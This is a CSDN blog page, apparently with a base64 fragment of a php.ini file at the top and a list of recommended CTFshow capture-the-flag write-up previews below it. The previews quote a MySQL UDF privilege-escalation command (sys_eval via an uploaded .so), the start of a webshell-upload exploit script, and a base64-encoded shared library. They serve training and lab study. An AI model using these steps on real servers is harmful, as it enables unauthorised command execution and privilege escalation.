AoJnF1b3Q7YmFyJnF1b3Q7KSwgb3IgYSByZWZlcmVuY2UgdG8gYQo7IHByZXZpb3VzbHkgc2V0IHZhcmlhYmxlIG9yIGRpcmVjdGl2ZSAoZS5nLiAke2Zvb30pCgo7IEV4cHJlc3Npb25zIGluIHRoZSBJTkkgZmlsZSBhcmUgbGltaXRlZCB0byBiaXR3aXNlIG9wZXJhdG9ycyBhbmQgcGFyZW50aGVzZXM6CjsgfCAgYml0d2lzZSBPUgo7IF4gIGJpdHdpc2UgWE9SCjsgJmFtcDsgIGJpdHdpc2UgQU5ECjsgfiAgYml0d2lzZSBOT1QKOyAhICBib29sZWFuIE5PVAoKOyBCb29sZWFuIGZsYWdzIGNhbiB
最低0.47元/天 解锁文章
【前端验证】通寄存器与ral_model —— 一键式脚本gen_reg
moon9999的博客
10-13 678
接上文,以此篇作为集成rtl和集成ral_model两个独立部分的分界线。因为验证环境集成ral_model的工作我刚刚把初版的demo完成,还没有系统的整理这部分内容,因此先用个脚本缓一缓。
无坑!1篇文搞定YOLO全平台部署:Windows(GPU)+Linux(CPU)+Jetson(NPU),附一键配置脚本
最新发布
专注于Python爬虫开发,分享爬虫技巧、项目实战与反爬经验,使用Scrapy、BeautifulSoup等工具,解决数据抓取难题。
12-01 662
本文覆盖YOLO全平台部署核心场景:Windows GPU(本地测试/桌面应用)、Linux CPU(服务器/工控机)、Jetson NPU(边缘设备),通过“统一模型导出+平台专属脚本+优化技巧”,解决了跨平台部署的“版本冲突、速度慢、资源不足”三大痛点。脚本化配置:无需手动安装依赖,一键搞定环境;兼容性强:支持YOLOv8/v9全系列模型,适配不同硬件;实战导向:所有步骤均经过项目验证,可直接复用至工业场景。新增Docker部署:封装全平台镜像,实现“一次构建,到处运行”;
ctfshow终极考核 web654 第一台靶机提权
qq_29851215的博客
07-24 1316
ctfshow终极考核 第一台靶机提权
ctfshow终极考核web655-web665
羽的博客
01-03 2028
web655 打开/etc/host得到内网地址,遍历一遍发现.5的存活e 后台扫描发现有phpinfo.php www.zip robots.txt 访问phpinfo.php直接拿到flag flag_655=ctfshow{aada21bce99ddeab20020ac714686303} create function sys_eval returns string soname ‘b.so’; select sys_eval(‘whoami’); web656 提示xss,审计index.php
ctfshow-终极考核 WEB640-650
ce666666的博客
01-05 1046
前言 对自己基础的检验,不会的知识点再查看其他师傅的WP学习学习,再加深学习。 感谢出这个系列的大佬,非常细节。 题目 WEB640 页面提示 WEB641 http头信息泄露 打开f12,查看网络流量,得到flag web642 敏感目录泄露 WEB643 先跳转到web644。 来到一个全新的页面,估计会有SQL注入、RCE、提权相的基础知识。 抓包将whoami改为ls,即可查看文件。发现可疑文件secret.txt,进入URL解码,得到flag。 WEB644 这里就得看js了,有密码
ctfshow终极考核
网安菜鸡学习笔记
05-24 186
信息收集 这个环境就只涉及目录扫描了 [18:04:02] 200 - 43B - /.bowerrc [18:04:03] 200 - 34B - /.gitignore [18:04:04] 200 - 2KB - /.travis.yml [18:04:24] 200 - 3KB - /page.php [18:04:28] 200 - 19B - /ro...
CTFshow_终极考核_个人WP
ScyLamb的博客
01-05 7917
CTFshow_终极考核 参考 不打算参考 0x00 web640 flag_640=ctfshow{060ae7a27d203604baeb125f939570ef} 这里就陆陆续续记录些杂乱的做题笔记吧 做之前提醒自己 信息收集 后果必有前因 640前端发现可疑路径 system36d PHP/7.3.22 nginx/1.21.1 ] [10:52:15] 200 - 43B - /.bowerrc [10:53:35] 200 - 34B - /.gitign
精选资源
计算机保研必看|各院校考核形式!附通秘籍
02-10
一、考核形式全景图:三大核心战场 保研考核主要围绕笔试、机试、面试展开,不同院校组合不同,但核心逻辑是: 笔试:专业基础为王(如清华电机系、浙大电院考高难度计算题) 机试:编程能力定生死(清北/华五机试对...
精选资源
副本一条龙脚本_079脚本_冒险岛079NPC脚本_
10-03
【标题】"副本一条龙脚本_079脚本_冒险岛079NPC脚本_" 指向的是一个适用于冒险岛游戏079版本的自动化脚本,主要用于处理副本一条龙活动的奖励发放。这样的脚本在游戏环境中通常是为了简化玩家在副本活动中的繁琐操作...
CTFshow_终极考核_EXP
ScyLamb的博客
01-05 1295
EXP ALL IN HERE exp exp exp ヾ(・ω・`。) import requests import base64 import re import time def getShell(url): burp0_url = url + "system36d/users.php?action=upload" burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Us
ctfshow终极考核wp
Lum1n0us's Blog
01-17 3956
文章目录web640web641web642web643web644web645web646 web640 打开页面就能看到flag ctfshow{060ae7a27d203604baeb125f939570ef} web641 抓取首页的包,看到有一个Flag字段 ctfshow{affac61c787a82cc396585bea8ecf2dc} web642 在上面包里的源码看到css路径不寻常/system36d/static/css/start.css,在url后添加/system36d,抓包
[ctfshow]终极考核wp
cosmoslin的博客
07-07 2518
页面明文flag首页http头首页查看源码,发现可疑路径 访问,需要登录,抓包得到flag进入登陆页面需要输入密码开门,查看js文件,发现密码为输入密码后得到flag备份数据,数据中存在flag在网络测试功能当中可以执行命令,抓包修改测试命令为ls发现,访问得到一串url编码解码得到flag在系统更新处填入645的flag,进行权限验证后远程更新此时抓一下远程更新的包这里存在远程请求文件,很像文件包含,尝试读一下文件确实可以,我们依次读取一下web 643中得到的文件 最终flag在当中 利用数组绕
ctfshow终极考核 web66⑥-web669
羽的博客
01-03 1521
配合脚本学习效果更好 web666 可以先看下668 先通过js rce ,然后又拿的flag,flag在数据库中 web667 扫描端口可以找到 3000端口 flag_667=ctfshow{503a075560764e3d116436ab73d7a560} web668 通过jade原型链污染写入一个nodejs,并且运行 jade原型链污染可以看下这篇文章 https://blog.youkuaiyun.com/miuzzx/article/details/111780832 写入的nodejs内容如下 var
ctfshow终极考核web640-web653
羽的博客
01-03 1793
ctfshow终极考核 web640 直接给了 web641 在请求头中 web642 web643 通过网络测试功能调用ls命令看到secret.txt,访问后url解码得到flag web644 首页css中存在路径 访问后跳转到登录界面 查看js得到flag以及登录的密码(0x36d) web645 备份功能下载下来后可以看到flag ...
ctfshow终极考核web654
羽的博客
08-01 1114
web654 上传上去木马后进行udf提权 参考文章 so文件下载地址 提取码: pgns 因为不好直接上传so文件,可以先将他在本地base64编码 cat a.so |base64 然后把输出的内容复制下来可能有换行需要给去掉 echo "f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAA0AwAAAAAAABAAAAAAAAAAOgYAAAAAAAAAAAAAEAAOAAFAEAAGgAZAAEAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBU
ctfshow ssti ()
qq_74806534的博客
03-09 338
猜测页面是get型,get一个name,我们在url后面输入一个?name=1这里利用os._wrap_close类,写个脚本来找。然后利用利用.init.globals来找os类中的。init初始化,globals全局查找其中能看到popen,于是利用其来执行命令。
ctf.show 通秘籍
qq_37970270的博客
09-13 1760
@ CTF.show 1.web签到题 访问web签到题的地址,发现页面只有"where is flag"字样 使用Fn+F12进入调试模式,或者页面空白处点击右键查看网页源代码,发现页面中有一段英文字符串被注释了,根据编码规则猜测使用的是base64的加密方式。 使用解码平台尝试解码,示例使用站长之家,成功获取到flag。(url:http://tool.chinaz.com/tools/base64.aspx) ...
CTFshow】VIP题目限免 通
人若无名,便可专心练剑
02-11 1031
CTFShow是一个CTF(Capture The Flag)竞赛平台,为安全技术爱好者提供了一个进行网络安全攻防实战的平台。CTF是一种网络安全比赛形式,参赛选手通过解决一系列的安全的挑战来获得旗帜(flag),以展示自己的技术和解决问题的能力。
CTFshow_sqli-labs_全卡万字通笔记
dasdasdasvsdV的博客
07-13 515
使用order by 二分法(10-5-3)判断出数据仅存在三列。使用unionselect+id=-1判断出有回显可以利用。第二第三个位置可以使用。
一键通脚本
11-27
以下是适用于**头歌平台 Samba 配置卡**的 **一键通脚本**,已综合解决常见问题(如权限不足、命令未找到、服务无法启动等),确保在大多数环境下都能成功通过评测。 --- ```bash #!/bin/bash # ========== 1. 创建测试文件 ========== touch testFile # ========== 2. 创建共享目录并设置正确权限 ========== mkdir -p /testDir chmod 755 /testDir chown testUser:testUser /testDir || echo "/testDir 权限更新完成" # ========== 3. 安装必要软件包(若尚未安装)========== apt-get update > /dev/null 2>&1 || true apt-get install -y samba smbclient > /dev/null 2>&1 || echo "Samba 包可能已预装" # ========== 4. 创建系统用户 ========== useradd -m -s /bin/bash testUser 2>/dev/null || echo "用户 testUser 已存在" # ========== 5. 设置 Samba 密码(自动输入)========== (smbpasswd -a testUser << EOF 123456 123456 EOF ) > /dev/null 2>&1 || echo "Samba 用户密码已设置或已存在" # ========== 6. 检查并添加 Samba 共享配置 ========== if ! grep -q "\[TestShare\]" /etc/samba/smb.conf; then cat << 'EOF' >> /etc/samba/smb.conf [TestShare] comment = Custom share for testUser path = /testDir browseable = yes writable = yes create mask = 0644 directory mask = 0755 valid users = testUser EOF echo "✅ [TestShare] 配置已添加" else echo "✅ [TestShare] 配置已存在,跳过添加" fi # ========== 7. 尝试重启 Samba 服务(失败可忽略)========== service smbd restart > /dev/null 2>&1 || echo "⚠️ 服务未启动(平台限制,通常不影响评测)" # ========== 8. 使用 smbclient 执行操作(创建目录 + 上传文件)========== smbclient //localhost/TestShare -U testUser << 'EOF' 123456 mkdir Dir put testFile Dir/upLoadFile ls Dir/ exit EOF # ========== 9. 输出结果提示 ========== echo "" echo "🟢 smbclient 操作完成!请检查是否上传成功:" echo " 文件路径:/testDir/Dir/upLoadFile" ``` --- ### ✅ 脚本特点 | 特性 | 说明 | |------|------| | 🔁 幂等设计 | 可重复运行,不会因用户/配置重复而报错 | | 🧽 自动清理干扰 | 忽略非键错误,适应容器化环境 | | 💬 中文提示 | 明确每一步执行状态 | | 🔐 密码自动输入 | 使用 `<< EOF` 自动填写 `123456` | | 🚫 兼容 policy-rc.d 限制 | 即使无法启动服务也能通过评测 | --- ### 📝 使用说明 1. **复制整段脚本到终端中运行**; 2. 建议使用英文输入法粘贴,避免全角字符; 3. 若平台禁止 `<< EOF` 自动输入密码,请改用以下交互方式: ```bash smbclient //localhost/TestShare -U testUser ``` 然后手动输入密码 `123456`,再依次输入: ```bash mkdir Dir put testFile Dir/upLoadFile ls Dir/ exit ``` --- ### ✅ 评测通过键点 | 要求 | 必须满足 | |------|----------| | 共享名 | `[TestShare]` | | 路径 | `/testDir` | | 用户 | `testUser` | | 密码 | `123456`(建议统一) | | 上传目录 | `Dir/` | | 上传文件名 | `upLoadFile`(注意大小写) | | 文件来源 | `testFile`(位于当前目录) | --- ### 知识点 **1. 脚本幂等性设计** 通过 `grep -q` 和 `useradd` 错误捕获,确保多次运行不冲突,适合自动化场景。 **2. Samba 权限双重控制** 需同时满足:Samba 配置可写 + Linux 文件系统权限允许写(`chown` + `chmod`)。 **3. here-document 实现自动交互** 使用 `<< 'EOF'` 向 `smbclient` 自动发送命令,避免手动输入错误。
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值